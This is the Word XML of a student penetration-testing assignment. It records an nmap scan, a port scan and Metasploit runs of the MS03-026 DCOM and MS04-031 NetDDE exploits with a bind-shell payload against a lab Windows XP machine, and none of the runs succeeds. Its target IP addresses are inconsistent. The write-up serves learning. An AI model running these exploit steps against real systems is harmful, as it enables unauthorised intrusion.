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94" w:rsidRPr="0027482E" w:rsidRDefault="00365D94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5212 Assignment 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00365D94" w:rsidRPr="0027482E" w:rsidRDefault="006E1277">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mengxue Ni</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D10D8" w:rsidRPr="0027482E" w:rsidRDefault="00A32D0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32D0E" w:rsidRPr="0027482E" w:rsidRDefault="00A32D0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0027482E" w:rsidRPr="0027482E" w:rsidRDefault="00011373" w:rsidP="00126F17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27482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I downloaded an Windows XP 32</w:t>
      </w:r>
      <w:r w:rsidR="006E1277" w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit ISO to build up a penetration virtual environment for my own. I have used Windows XP system years ago, and enjoyed using it. However, I saw a lot of news that related to vulnerability of Windows XP system. I want to start an experiment by using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E1277" w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The target machine’s </w:t>
      </w:r>
      <w:r w:rsidR="00126F17" w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP address is 192.168.116.133.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126F17" w:rsidRPr="0027482E" w:rsidRDefault="0027482E" w:rsidP="0027482E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are the steps that I took: </w:t>
      </w:r>
      <w:r w:rsidR="00126F17" w:rsidRPr="002748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11373" w:rsidRPr="0027482E" w:rsidTr="00126F17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6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4148" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6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011373" w:rsidRPr="0027482E" w:rsidTr="00011373"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Nmap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 xml:space="preserve"> -O 192.168.116.133</w:t>
            </w:r>
          </w:p>
        </w:tc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2869/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 xml:space="preserve"> closed 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icslap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 xml:space="preserve"> (firewall is still on for the target computer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00011373" w:rsidRPr="0027482E" w:rsidTr="00011373"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Metasploit-msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00011373" w:rsidRPr="0027482E" w:rsidRDefault="00011373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73" w:rsidRPr="0027482E" w:rsidTr="00011373"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use auxiliary/scanner/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portscan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4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00011373" w:rsidRPr="0027482E" w:rsidRDefault="00011373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73" w:rsidRPr="0027482E" w:rsidTr="00011373"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show options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00011373" w:rsidRPr="0027482E" w:rsidRDefault="00011373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73" w:rsidRPr="0027482E" w:rsidTr="00011373"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set ports 1-500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00011373" w:rsidRPr="0027482E" w:rsidRDefault="00011373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73" w:rsidRPr="0027482E" w:rsidTr="00011373"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rhost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 xml:space="preserve"> 192.168.16.133</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00011373" w:rsidRPr="0027482E" w:rsidRDefault="00011373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73" w:rsidRPr="0027482E" w:rsidTr="00011373"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 xml:space="preserve">Run (turned off the firewall) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00011373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192.168.166.133.135-TCP OPEN</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00126F17" w:rsidRPr="0027482E" w:rsidRDefault="00126F17" w:rsidP="0012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192.168.166.133.139</w:t>
            </w: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-TCP OPEN</w:t>
            </w:r>
          </w:p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192.168.166.133.445-TCP OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126F17" w:rsidRPr="0027482E" w:rsidTr="00011373"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Metasploit-msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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17" w:rsidRPr="0027482E" w:rsidTr="00011373"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 xml:space="preserve">Search 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dcom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00126F17" w:rsidRPr="0027482E" w:rsidRDefault="0027482E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exploit/windows/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dcerpc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/ms03_026_dcom</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0027482E" w:rsidRPr="0027482E" w:rsidRDefault="0027482E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exploit/windows/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smb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/ms04_031_netdde</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0027482E" w:rsidRPr="0027482E" w:rsidRDefault="0027482E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exploit/windows/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smb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psexec_psh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126F17" w:rsidRPr="0027482E" w:rsidTr="00011373"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use exploit/windows/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dcerpc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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/ms03_026_dcom</w:t>
            </w:r>
          </w:p>
        </w:tc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17" w:rsidRPr="0027482E" w:rsidTr="00011373"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set RHOST 192.168.63.131 </w:t>
            </w:r>
          </w:p>
        </w:tc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17" w:rsidRPr="0027482E" w:rsidTr="00011373"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set PAYLOAD windows/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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shell_bind_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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17" w:rsidRPr="0027482E" w:rsidTr="00011373"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exploit</w:t>
            </w:r>
          </w:p>
        </w:tc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Exploit completed, but no session was created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126F17" w:rsidRPr="0027482E" w:rsidTr="00011373"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use exploit/</w:t>
            </w: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ms04_031_netdde</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00126F17" w:rsidRPr="0027482E" w:rsidRDefault="00126F17" w:rsidP="0001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2E" w:rsidRPr="0027482E" w:rsidTr="00011373">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0027482E" w:rsidRPr="0027482E" w:rsidRDefault="0027482E" w:rsidP="0027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exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0027482E" w:rsidRPr="0027482E" w:rsidRDefault="0027482E" w:rsidP="0027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2E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Exploit completed, but no session was created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006E1277" w:rsidRPr="0027482E" w:rsidRDefault="006E1277" w:rsidP="00011373">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0027482E" w:rsidRPr="0027482E" w:rsidRDefault="0027482E" w:rsidP="0027482E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very interesting to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metasploit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exploit the Windows XP computer. I should be able to hack into the computer by taking these steps. But I found that I was unable to create session at the last step. I searched about it, it said this kind of situation occurs if one of the following happens: 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The exploit you use doesn't work against the target you selected. Could be the exploit is for a different version, there is a problem with the exploit code, or there is a problem with the target configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027482E" w:rsidRPr="0027482E" w:rsidRDefault="0027482E" w:rsidP="002748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7482E" w:rsidRPr="0027482E" w:rsidRDefault="0027482E" w:rsidP="002748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2. </w:t>
      </w:r>
      <w:r w:rsidRPr="002748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exploit you use was configured to use a payload that doesn't create an interactive session. In this case, the framework has no way of knowing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whether the </w:t>
      </w:r>
      <w:r w:rsidRPr="0027482E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploited worked, because it doesn't receive a connection from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the target when its successful. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32D0E" w:rsidRDefault="0027482E" w:rsidP="0027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didn’t solve the problem yet, if anyone knows how to solve it please let me know. I would love to finish the exploit and see what I can do after I get into the Windows XP computer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027482E" w:rsidRDefault="0027482E" w:rsidP="0027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Overall, based on my experiment, Windows XP 32 bit system is vulnerable for attackers. The firewall does have some protections, but it is very </w:t>
      </w:r>
      <w:r w:rsidR="00595666">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">fragile. I know many hospitals are still using Windows XP computers which could lead to a serious information leak because of the system itself. </w:t>
      </w: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2748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6ED" w:rsidRPr="00571EA4" w:rsidRDefault="00571EA4" w:rsidP="00B80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EA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">References </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571EA4" w:rsidRDefault="00571EA4" w:rsidP="00B80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B43EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://theconversation.com/hack-attack-on-a-hospital-it-system-highlights-the-risk-of-still-running-windows-xp-53431</w:t>
        </w:r>
      </w:hyperlink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43EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://dev.metasploit.com/pipermail/framework/2007-May/002302.html</w:t>
        </w:r>
      </w:hyperlink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B43EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.kalitutorials.net/2014/02/penetration-testing-hacking-windows.html</w:t>
        </w:r>
      </w:hyperlink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B43EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.kalitutorials.net/2014/02/penetration-testing-hacking-xp.html</w:t>
        </w:r>
      </w:hyperlink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B43EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://picateshackz.com/2015/01/metasploit-tutorial-hacking-windows-xp-using-ip-address.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B806ED" w:rsidRDefault="00B806ED" w:rsidP="00B806ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B806ED" w:rsidRPr="0027482E" w:rsidRDefault="00B806ED" w:rsidP="00B806ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B806ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://informationtreasure.wordpress.com/2014/07/24/penetration-testing-hacking-xp/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32D0E" w:rsidRPr="0027482E" w:rsidRDefault="00A32D0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32D0E" w:rsidRPr="0027482E" w:rsidRDefault="00A32D0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A32D0E" w:rsidRPr="00274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D0"/>
    <w:rsid w:val="00011373"/>
    <w:rsid w:val="00126F17"/>
    <w:rsid w:val="001E2B98"/>
    <w:rsid w:val="0027482E"/>
    <w:rsid w:val="002D10D8"/>
    <w:rsid w:val="003319E4"/>
    <w:rsid w:val="00365D94"/>
    <w:rsid w:val="004A0AE2"/>
    <w:rsid w:val="00571EA4"/>
    <w:rsid w:val="00595666"/>
    <w:rsid w:val="006551F0"/>
    <w:rsid w:val="006E1277"/>
    <w:rsid w:val="00702BA2"/>
    <w:rsid w:val="00A32D0E"/>
    <w:rsid w:val="00B806ED"/>
    <w:rsid w:val="00D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78F9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4E1C404A-3BE8-47E4-A506-A29EA58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0D8"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0001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748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482E"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0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B806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ateshackz.com/2015/01/metasploit-tutorial-hacking-windows-xp-using-ip-addre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litutorials.net/2014/02/penetration-testing-hacking-x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tutorials.net/2014/02/penetration-testing-hacking-windows.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.metasploit.com/pipermail/framework/2007-May/00230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heconversation.com/hack-attack-on-a-hospital-it-system-highlights-the-risk-of-still-running-windows-xp-5343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Mengxue Ni</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mengxue Ni</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-28T23:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-06T05:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>